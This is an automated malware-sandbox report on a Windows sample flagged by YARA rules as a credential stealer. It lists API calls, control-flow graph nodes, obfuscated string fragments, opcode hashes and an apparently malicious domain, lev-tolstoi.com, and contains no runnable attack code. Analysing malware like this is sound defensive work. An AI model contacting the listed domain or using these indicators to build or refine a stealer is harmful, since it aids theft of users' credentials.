                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2282746044.000000000159C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2283719723.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2284073141.000000000159E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000003.2286941764.00000000015A7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                  Reputation:low
                                                                                                                                                                                                                                  Has exited:true


                                                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                                                    Execution Coverage:27.7%
                                                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                    Signature Coverage:68.2%
                                                                                                                                                                                                                                    Total number of Nodes:255
                                                                                                                                                                                                                                    Total number of Limit Nodes:23
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: *,-"$3F&D$_^]\$ntxE$pt}w$qRb`$t~v:$uqrs$w}MI${zdy$~mfQ$S\]$WQ$L4$L4
                                                                                                                                                                                                                                    • API String ID: 0-510280711

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
                                                                                                                                                                                                                                    • API String ID: 0-1565257739
                                                                                                                                                                                                                                    • Opcode ID: c6e7dc6c803628b3693a14e4f06b6e60d1193b2c784333091e3953fcf347bcfe
                                                                                                                                                                                                                                    • Instruction ID: 2ff38c781c0ccd25d10f7157443096d54074d9848f82b00abe23cb520567b818
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: c6e7dc6c803628b3693a14e4f06b6e60d1193b2c784333091e3953fcf347bcfe
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E522AF7150CB808FD3248F29C48536FBBE1AB86314F18896EE5E987392D77AC945DB43

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • SysAllocString.OLEAUT32(00001F7A), ref: 00C79551
                                                                                                                                                                                                                                    • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00C7958F
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32 ref: 00C798DF
                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00C798E5
                                                                                                                                                                                                                                    • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 00C7992E
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                    • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                    • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                    • Opcode ID: 60cb9665a88011231d49cfe247d71dd2a8ef6093107ee8e6a00c700aaf0fa6ec
                                                                                                                                                                                                                                    • Instruction ID: 8a5da3e73508a8e6eccc1681e8ba1617d5dd1da5d70ecf42dde16cc26836b43f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 60cb9665a88011231d49cfe247d71dd2a8ef6093107ee8e6a00c700aaf0fa6ec
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 36220376A183519BE310CF24C881B5BBBE2EFC5314F18C92CE5989B3A1D775D945CB82

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
                                                                                                                                                                                                                                    • API String ID: 0-620192811
                                                                                                                                                                                                                                    • Opcode ID: 6279985e86268586f9854b3ee5e25884d1ab70d32c8033864dcda767d7e737bb
                                                                                                                                                                                                                                    • Instruction ID: fe969d92d5163e64eb3cc7906ea627c1e37201d58dd074b7ccccfdcdb92203e0
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6279985e86268586f9854b3ee5e25884d1ab70d32c8033864dcda767d7e737bb
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B70255B1200B01DFD724CF25D891B9BBBF1FB49314F108A2DE5AA8BAA0D775A845CF54

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • RtlExpandEnvironmentStrings.NTDLL(?), ref: 00C4FDFC
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: EnvironmentExpandStrings
                                                                                                                                                                                                                                    • String ID: #$6$=$\$g$m$w$x
                                                                                                                                                                                                                                    • API String ID: 237503144-139252074
                                                                                                                                                                                                                                    • Opcode ID: 8e266b8e69604b92f7f166f3ef458091561ee76a17e3f0ef0c907e5f984c114a
                                                                                                                                                                                                                                    • Instruction ID: 3930a15d1dfc1bb187ac17c4b7b2b5717e8102eba7fcf9a2ceec9b47670b03d2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8e266b8e69604b92f7f166f3ef458091561ee76a17e3f0ef0c907e5f984c114a
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5E72A43261C7908BD324DA39C85539FBAD2ABD5324F198B3DE8E9C73D2D67489428743

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: )$+$>$@$F$L$[$`
                                                                                                                                                                                                                                    • API String ID: 0-4163809010
                                                                                                                                                                                                                                    • Opcode ID: 96d1d40b8086f37221e3ec0b90644e6291773b22a3e71f59e285d240afbfac35
                                                                                                                                                                                                                                    • Instruction ID: 88a45051010b78b8bd19128971a5f12416e5e69d30dab42af2df123e8f4b22dd
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 96d1d40b8086f37221e3ec0b90644e6291773b22a3e71f59e285d240afbfac35
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: B052A17660C7808BD324DB38C4953AFBBE1AB95320F194A2DECE9C73C1D63489859B47

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: \$\$\$]$]$]$^$^$^$_$_$_
                                                                                                                                                                                                                                    • API String ID: 0-1108506012
                                                                                                                                                                                                                                    • Opcode ID: 2705eebc883d9ba474ce5365f6ffd0fc3815efd1d8563c764a079af2cdd7e1cf
                                                                                                                                                                                                                                    • Instruction ID: 5023a0312d0e6b122eae2d21e0ab3ec6b9022052d92858a196ace507bc7001c7
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2705eebc883d9ba474ce5365f6ffd0fc3815efd1d8563c764a079af2cdd7e1cf
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: F3B1277264C7808BE3148A29CC8536FBFD297C5324F1D8B6DE5E9873C2C6B8C9858746

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367712406.0000000000E84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367729171.0000000000E85000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367746796.0000000000E89000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367769950.0000000000E9E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367786833.0000000000EA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367803218.0000000000EA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367820720.0000000000EA5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367838500.0000000000EAC000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367855458.0000000000EAE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367873504.0000000000EB7000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EB8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367890292.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367948363.0000000000F1D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F1E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2367968441.0000000000F27000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368008632.0000000000F35000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Uninitialize
                                                                                                                                                                                                                                    • String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
                                                                                                                                                                                                                                    • API String ID: 3861434553-1386727196
                                                                                                                                                                                                                                    • Opcode ID: 6b9cc2e30f9a6779b2f36d6a440f7664b509acd38744f4e99d26c0d0996f4e03
                                                                                                                                                                                                                                    • Instruction ID: 6e84ef37e08f398f748fc8a8c4fd8da496fa07e98d199b9ffa57821117b976d8
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b9cc2e30f9a6779b2f36d6a440f7664b509acd38744f4e99d26c0d0996f4e03
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 09A103B42057818FD726CF29C4D0662BFE2FF96310B18859CC8E24F76AD739A846CB51

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 1088 c48600-c48611 call c7d9a0 1091 c48617-c4861e call c762a0 1088->1091 1092 c48a48-c48a4b ExitProcess 1088->1092 1095 c48624-c4864a 1091->1095 1096 c48a31-c48a38 1091->1096 1104 c48650-c4887f 1095->1104 1105 c4864c-c4864e 1095->1105 1097 c48a43 call c7e080 1096->1097 1098 c48a3a-c48a40 call c47f60 1096->1098 1097->1092 1098->1097 1107 c48880-c488ce 1104->1107 1105->1104 1107->1107 1108 c488d0-c4891d call c7c540 1107->1108 1111 c48920-c48943 1108->1111 1112 c48964-c4897c 1111->1112 1113 c48945-c48962 1111->1113 1115 c48982-c48a0b 1112->1115 1116 c48a0d-c48a25 call c49d00 1112->1116 1113->1111 1115->1116 1116->1096 1119 c48a27 call c4cb90 1116->1119 1121 c48a2c call c4b7b0 1119->1121 1121->1096
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • ExitProcess.KERNEL32(00000000), ref: 00C48A4B
                                                                                                                                                                                                                                      • Part of subcall function 00C4B7B0: FreeLibrary.KERNEL32(00C48A31), ref: 00C4B7B6
                                                                                                                                                                                                                                      • Part of subcall function 00C4B7B0: FreeLibrary.KERNEL32 ref: 00C4B7D7
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: FreeLibrary$ExitProcess
                                                                                                                                                                                                                                    • String ID: b]u)$}$}
                                                                                                                                                                                                                                    • API String ID: 1614911148-2900034282
                                                                                                                                                                                                                                    • Opcode ID: 243291cbf1907dccc440ba7e7f09272a3b21f7dae6c4faf5620f2e1b3d47cf56
                                                                                                                                                                                                                                    • Instruction ID: 01d2ad26368da06b26f8099a1ddf05044929af739cb3c90e6874ea774a86f78f
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 243291cbf1907dccc440ba7e7f09272a3b21f7dae6c4faf5620f2e1b3d47cf56
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: ECC1F773E187144BC718DF69C84125AF7D6ABC8710F0EC52EA898EB395EA74DD048BC6

                                                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                                                    control_flow_graph 1139 c6d34a-c6d362 1140 c6d370-c6d382 1139->1140 1140->1140 1141 c6d384-c6d389 1140->1141 1142 c6d39b-c6d3a7 1141->1142 1143 c6d38b-c6d38f 1141->1143 1144 c6d3c1-c6d40f call c7fe00 GetPhysicallyInstalledSystemMemory 1142->1144 1145 c6d3a9-c6d3ab 1142->1145 1146 c6d390-c6d399 1143->1146 1151 c6d410-c6d44d 1144->1151 1147 c6d3b0-c6d3bd 1145->1147 1146->1142 1146->1146 1147->1147 1149 c6d3bf 1147->1149 1149->1144 1151->1151 1152 c6d44f-c6d498 call c5e960 1151->1152 1155 c6d4a0-c6d551 1152->1155 1155->1155 1156 c6d557-c6d55c 1155->1156 1157 c6d55e-c6d568 1156->1157 1158 c6d57d-c6d583 1156->1158 1160 c6d570-c6d579 1157->1160 1159 c6d586-c6d58e 1158->1159 1161 c6d590-c6d591 1159->1161 1162 c6d5ab-c6d5b3 1159->1162 1160->1160 1163 c6d57b 1160->1163 1164 c6d5a0-c6d5a9 1161->1164 1165 c6d5b5-c6d5b6 1162->1165 1166 c6d5cb-c6d611 1162->1166 1163->1159 1164->1162 1164->1164 1167 c6d5c0-c6d5c9 1165->1167 1168 c6d620-c6d653 1166->1168 1167->1166 1167->1167 1168->1168 1169 c6d655-c6d65a 1168->1169 1170 c6d65c-c6d65d 1169->1170 1171 c6d66d 1169->1171 1172 c6d660-c6d669 1170->1172 1173 c6d670-c6d67a 1171->1173 1172->1172 1174 c6d66b 1172->1174 1175 c6d67c-c6d67f 1173->1175 1176 c6d68b-c6d73c 1173->1176 1174->1173 1177 c6d680-c6d689 1175->1177 1177->1176 1177->1177
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 00C6D3EE
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                    • String ID: ><+
                                                                                                                                                                                                                                    • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                    • Opcode ID: 34b971d35c7b69e3121194d2ac89ecec3dcd8ef93a4acb2eedcc41d82d1dff6b
                                                                                                                                                                                                                                    • Instruction ID: 41da4334c29c09285546f8f52421f82223d46d6e1c7f006760c5a210ae247a17
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 34b971d35c7b69e3121194d2ac89ecec3dcd8ef93a4acb2eedcc41d82d1dff6b
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7C1C275A047418FD725CF2AC490762FBE2BF9A310B28859ED4EB8B752C735E906CB50
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: @Ukx$
                                                                                                                                                                                                                                    • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                    • Opcode ID: daf8fb2c78a2f59409cc4f611ea6b3e22b7cc17834d04c10ffd59a0892e29a6e
                                                                                                                                                                                                                                    • Instruction ID: 5e1418a4d048e45a5cc227cd6a1389b20e218a92c948eb3459548a0f7bbea243
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: daf8fb2c78a2f59409cc4f611ea6b3e22b7cc17834d04c10ffd59a0892e29a6e
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 71B16532B087104BD3289E28DCD12AFB7E6EBC5318F2DC53CE99657385DA359D068781
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: CBDD7B477E2DD198BEBA0C6A975F1733
                                                                                                                                                                                                                                    • API String ID: 0-1004846748
                                                                                                                                                                                                                                    • Opcode ID: 54bc3c0262c4e58f90ad4bf63cee3df60fb803b43cf29b4b0b78751b92c3760c
                                                                                                                                                                                                                                    • Instruction ID: 4fcd8a305540578db647ca5c767e5cbea99ad7dcbe5fd08fc4e79c366fbe679c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 54bc3c0262c4e58f90ad4bf63cee3df60fb803b43cf29b4b0b78751b92c3760c
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 53815D75640B418BD724CB38CC927A7B7E2FF9A315F0DCA6CD4968B743E639A8428750
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: _^]\
                                                                                                                                                                                                                                    • API String ID: 2994545307-3116432788
                                                                                                                                                                                                                                    • Opcode ID: 55ebc10f66db3e39f6cdd2d2d1f93165eaaf36df984803b9003fa8651e40b019
                                                                                                                                                                                                                                    • Instruction ID: c981809414619843eca81a3ebe9653923392cfd4751edf5739829ff944aedb09
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 55ebc10f66db3e39f6cdd2d2d1f93165eaaf36df984803b9003fa8651e40b019
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: C27136B1A083005BE7249F69DCD2B3B77E1EF8131CF188A2CE49687282E634DD059756
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    • LdrInitializeThunk.NTDLL(00C8148A,?,00000018,?,?,00000018,?,?,?), ref: 00C7E13E
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                                                                                                    • Opcode ID: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                    • Instruction ID: 0c3231226d6b2b3a527619dcc08e6164a4fafcc19f94aab6dc14dc2c5ea58878
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 428b37146f2ab8bbef251fdb989594d24ae2c5b49c4db8728953df82dacde34d
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A2E0FE75908316AF9A08CF45C14444EFBE5BFC4714F11CC8DA4D863210D3B0AD46DF82
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: =<32
                                                                                                                                                                                                                                    • API String ID: 2994545307-852023076
                                                                                                                                                                                                                                    • Opcode ID: e63452465079af40646166f7308bf9124f549d55d68840bcf2d97bad42907eee
                                                                                                                                                                                                                                    • Instruction ID: 86e00cc1eb8f9c499f0bf43171c65396e391c726427ce8d4d5871ac6827a453d
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: e63452465079af40646166f7308bf9124f549d55d68840bcf2d97bad42907eee
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: A63168346043049BE714AE149C92B3FB3D9EB85758F1C852CFA94572D0E730DD42978A
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                                                    • String ID: ,-
                                                                                                                                                                                                                                    • API String ID: 0-1027024164
                                                                                                                                                                                                                                    • Opcode ID: 1e9b2c5879b7cbc52cca9a1e281d2a5f03ff3223d2b6bac2dbca510ee9dc6028
                                                                                                                                                                                                                                    • Instruction ID: 889f03f36c5e903def33978733df7f6048808d8c677619ba11a4025f70311037
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1e9b2c5879b7cbc52cca9a1e281d2a5f03ff3223d2b6bac2dbca510ee9dc6028
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DB2137A19163008BC7249F29CC92537B7F1EF82366F4D8618E8968B352F734CE05D7A6
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000000.00000002.2368026396.0000000000F36000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID: @
                                                                                                                                                                                                                                    • API String ID: 2994545307-2766056989
                                                                                                                                                                                                                                    • Opcode ID: 459542b16a39f716c1acc51efbf753a7a8d4a369c2e7a3dbc5ac64c55b2610ad
                                                                                                                                                                                                                                    • Instruction ID: f3fabab3e54df9e81b489225551a3721700408b3f4ae718a35008d2ad288ffd2
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 459542b16a39f716c1acc51efbf753a7a8d4a369c2e7a3dbc5ac64c55b2610ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 2431E1715083048BD314EF58D8D266FBBE4EBC5328F24892DE6A987290D735D948CB9A
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000000.00000002.2367129117.0000000000C41000.00000040.00000001.01000000.00000003.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_c40000_YKri2nEBWE.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                                                                                                    • String ID:
